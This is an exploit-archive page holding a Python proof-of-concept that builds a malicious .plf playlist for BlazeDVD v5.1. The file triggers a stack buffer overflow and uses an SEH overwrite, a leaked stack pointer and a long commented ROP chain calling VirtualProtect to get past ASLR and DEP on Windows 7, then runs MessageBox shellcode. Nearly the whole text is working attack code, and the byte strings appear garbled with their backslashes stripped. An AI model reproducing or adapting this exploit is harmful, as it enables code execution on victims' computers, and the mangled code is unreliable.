BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
# Published : 2010-06-17
# Author : mr_me
# Previous Title : Orbital Viewer v1.04 (.ov) Local Universal Stack Overflow Exploit [SEH]
# Next Title : Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
#!/usr/bin/python
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7
# Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley
# Download: http://www.blazevideo.com/
# Tested on windows 7 version N - DEP = AlwaysOn 
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/ 
# Greetz to ryujin ! :P
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# This PoC demonstates how we can bypass ASLR by stealing a 
# pointer off the stack and calculating the offset.
# Then setup the VirtualProtect() call and execute it to bypass DEP as well.
# All addresses are from ALSR non protected modules with BlazeDVD.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# 
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# write-up here: http://net-ninja.net/blog/?p=124

def banner(): 
    print "|------------------------------------------------------------------|" 
    print "|                         __               __                      |" 
    print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |" 
    print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |" 
    print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |" 
    print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |" 
    print "|                                                                  |"     
    print "|-------------------------------------------------[ EIP Hunters ]--|" 
    print "[+] BlazeDVD v5.1 (plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7" 
	
# MessageBoxA - "mr_me defeats ASLR & DEP !"
sc = ("xbfx3ax13x11xddxd9xc8x33xc9xb1x4bxd9x74x24"
"xf4x5bx31x7bx14x83xebxfcx03x7bx10xd8xe6xc8"
"x36x87xd0x9fxecx43xd3x8dx5fxd1x25xfbxc4xae"
"x37xcbx8fxc6xbbxa0xe6x3ax4fxf0x0exc9x31xdd"
"x85xfbxf5x52x82x76xf5x34xb3xa9x06x27xd3xc2"
"x95x8cx30x5fx20xf1xb3x0bxaex71xc5x59x3bxcb"
"xddx16x66xecxdcxc3x74xdbx97x98x4fxafx29x70"
"x9ex50x18x4cx1dx02xdfx8cxaax51x21xc3x5ex67"
"x66x32x91x98x97x3bx69x1bx4cxebxfbx3dx07xb1"
"x27xc3xf3x23xa3xcfx48x20xe9xd3x4fxddx85xe8"
"xc4x20x72x79x9ex06x9ex1bxdcxf4x96xf2x36x71"
"x43x8dx75xe9x02xc0x77x05x48x35x1bx2ax92x3a"
"xadx91x69x7exd0xc1x90xf3xaaxedx70xa6x5cx86"
"x86xb9x62x11x3dx4exf5x4dxd2x6exfaxe5x19x5d"
"x2ax91x35xd4x41x3cxb4x9exfax9ax32x16xe4xb4"
"xbdx7dxedxb1x80x2ex56x69xa6x82x14xeexbbx38"
"x37x18x9dxbfx48x27x4ax2dxefxf7xabxc5x2fxa3"
"xcex74x58x39x78x03xe1xd5x29x8ex72x50xa6x3c"
"x14xf4x16xd5x95x67x25x40x2bxacx41xd6x6fx47"
"xdbx04x07x47xfax92xf8xefxdcx66xbcxbfx74x2b"
"x6cx1fxa3xdbxe3x7fxeax48x6cx19x89x0fx18x8d"
"x34xf0x84x28xdfx9dx36xedx72x6fx7ex99xc1xab"
"x9ax10x38x82x48x70xe8xb4x3ex8bxdex06x7fx23"
"x20x3dx77")

junk = 'x43' * 312
## This is where we land after our stack pivot ##
rop2 = 'xe7x57x60x61' 			# 0x616057E7 : # MOV AX,100 # RETN 
rop2 += 'x41x41x41x41' 			# JUNK
rop2 += 'x9fxa5x62x61' * 73 	# 0x6162A59F : # ADD EAX,20 # POP EBX # RETN
rop2 += 'x44' * (612-len(junk)-len(rop2))

seh = 'xaex74x60x61'			# 0x616074AE : # ADD ESP,408 # RETN 4 
## leak ptr off the stack and calculate the offset for VirtualProtect() ##
rop = 'x9fxa5x62x61' * 62		# 0x6162A59F : # ADD EAX,20 # POP EBX # RETN
rop += 'xf0x8dx62x61' * 2		# 0x61628DF0 : # ADD EAX,0c # RETN
rop += 'xe3xd8x01x64'			# 0x6401D8E3 : # POP EDI # RETN
rop += 'x1bx10x10x64'			# 0x6410101B : # POP ESI # RETN
rop += 'x3bxf9x60x61'			# 0x6160F93B : # MOV EBX,EAX # CALL EDI
rop += 'x74x0cx32x60'			# 0x60320C74 : # SUB EBP,EBX # OR ESI,ESI # RETN
rop += 'x27x7ex01x64'			# 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'xe1x67x01x64'			# 0x640167E1 : # ADD EAX,EBP # RETN 2
rop += 'x4dxb2x10x64'			# 0x6410B24D : # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += 'x41x41'					# JUNK --------------------------^^
rop += 'x3exa0x10x64'			# 0x6410A03E : # MOV EDX,EBX # JMP SHORT NetReg.6410A083 --> # PPR # RETN 10
rop += 'x41x41x41x41'			# JUNK (for the p/p/r)
rop += 'x41x41x41x41'			# JUNK (for the p/p/r)
rop += 'x05x6cx02x64'			# 0x64026C05 : # SUB EAX,EDX # RETN
rop += 'x41x41x41x41'			# JUNK ---------------------------------------------------------------^^
rop += 'x41x41x41x41'			# JUNK
rop += 'x41x41x41x41'			# JUNK
rop += 'x41x41x41x41'			# JUNK
rop += 'x05x6cx02x64' * 14		# 0x64026C05 : # SUB EAX,EDX # RETN
rop += 'x24x41x60x61' * 88		# 0x61604124 : # ADD EAX,20 # RETN 4
rop += 'x41x41x41x41'			# JUNK ------------------------^^
rop += 'x97x7dx03x64' * 6		# 0x64037D97 : # ADD EAX,-2 # RETN

## Setup the VirtualProtect() call ##
rop += 'xa2x8bx60x61'			# 0x61608BA2 : # XCHG EAX,EDX # RETN
rop += 'x27x7ex01x64'			# 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'x59x9fx03x64' * 6		# 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x97x7dx03x64' * 4		# 0x64037D97 : # ADD EAX,-2 # RETN
rop += 'xa2x8bx60x61'			# 0x61608BA2 : # XCHG EAX,EDX # RETN
rop += 'x24x01x64x61'			# 0x61640124 : # XCHG EAX,EBX # RETN
rop += 'x27x7ex01x64'			# 0x64017E27 : # XOR EAX,EAX # RETN

## Calculate shellcode space ##
rop += 'x59x9fx03x64' * 65		# 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x24x01x64x61'			# 0x61640124 : # XCHG EAX,EBX # RETN
rop += 'xe3xd8x01x64'			# 0x6401D8E3 : # POP EDI # RETN
rop += 'x1cx10x10x64'			# 0x6410101C : # RETN (ROP NOP)
rop += 'x7exa9x60x61'			# 0x6160A97E : # XCHG EAX,EBP # RETN
rop += 'x27x7ex01x64'			# 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'x74x58x02x64'			# 0x64025874 : # PUSH ESP # POP ESI # RETN
rop += 'x60x8fx32x60'			# 0x60328F60 : # MOV EAX,ESI # POP ESI # RETN 4
rop += 'x71x97x32x60'			# 0x60329771 : # CALL EAX # JUNK --^^
rop += 'x59x9fx03x64'			# 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x41x41x41x41'			# JUNK ------------------------------------^^
rop += 'x59x9fx03x64' * 5		# 0x64039F59 : # ADD EAX,0C # RETN
rop += 'xf1x2ax10x64'			# 0x64102AF1 : # POP ECX # RETN
rop += 'x80xb1x11x64'			# 0x6411b180 : # A writeable location from .data
rop += 'x7exa9x60x61'			# 0x6160A97E : # XCHG EAX,EBP # RETN
rop += 'x07x40x63x61'			# 0x61634007 : # XCHG EAX,ESI # AND EAX,C95E0000 # RETN 0C
rop += 'x31x08x62x61'			# 0x61620831 : # PUSHAD # RETN

nops = "x90" * 30
exploit = junk + rop2 + seh + rop + nops + sc 
print "[+] cst-blazedvd.pl exploit file created!"
file=open('cst-blazedvd.plf','w')
file.write(exploit)
file.close()